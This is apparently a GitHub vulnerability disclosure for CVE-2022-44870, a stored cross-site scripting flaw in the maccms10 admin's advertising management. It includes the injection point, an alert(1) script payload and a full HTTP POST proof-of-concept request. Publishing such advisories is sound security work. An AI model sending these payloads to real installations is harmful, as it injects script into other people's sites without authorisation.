Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2022-44870

maccms admin+ xss attacks

Overview

Manufacturer's website information:https://maccms.pro

Source code download address : https://github.com/maccmspro/maccms10.git

  1. Affected version: V2021.1000.2000

图片

2.Vulnerability details

maccmspro/maccms10#23

Go to background, go to Basics > AD Management > Name,

Insert payload1 in the name box:

It can cause XSS attacks.

Vulnerability name:Storage type xss

Vulnerability level:Medium risk

Vulnerability location: Advertising management-->name

Insert <script>alert(1)</script> at cat_title

http://127.0.0.1/admin.php/admin/banner/infocat.html

图片

图片

3.Recurring vulnerabilities and POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat_id=&cat_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat_code=111

图片